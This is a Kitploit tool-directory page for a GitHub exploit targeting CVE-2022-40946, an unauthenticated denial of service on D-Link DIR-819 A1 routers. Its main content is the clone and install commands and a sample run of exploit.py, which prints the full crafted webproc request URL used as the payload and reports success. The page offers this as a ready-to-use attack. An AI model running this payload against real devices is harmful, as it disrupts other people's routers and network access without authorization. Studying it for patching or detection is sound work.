Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
dlink-dir-819-dos — Unauthenticated Denial of Service in DLink consumer DIR 819 A1 router | Kitploit
Tools/GitHubGitHub/whokilleddb/dlink-dir-819-dos
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubwhokilleddb/dlink-dir-819-dos

dlink-dir-819-dos

Unauthenticated Denial of Service in DLink consumer DIR 819 A1 router

View Repository
113 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-40946 Exploit: Unauthenticated Denial of Service in DLink consumer DIR 819 A1 routers

Exploit

Fetch the sources

root@kitploit:~
$ git clone https://github.com/whokilleddb/dlink-dir-819-dos
$ cd dlink-dir-819-dos
$ pip install -r requirements.txt

Run the exploit

root@kitploit:~
$ ./exploit.py -i 192.168.0.1                         
[+] DLink DIR-819 DoS exploit
[i] Address to attack: 192.168.0.1
[i] Using SSL:         False
[i] Request Timeout:   30s
[i] Buffer Length:     19
[i] Payload:           http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
[+] Exploit Successful!
Download Tool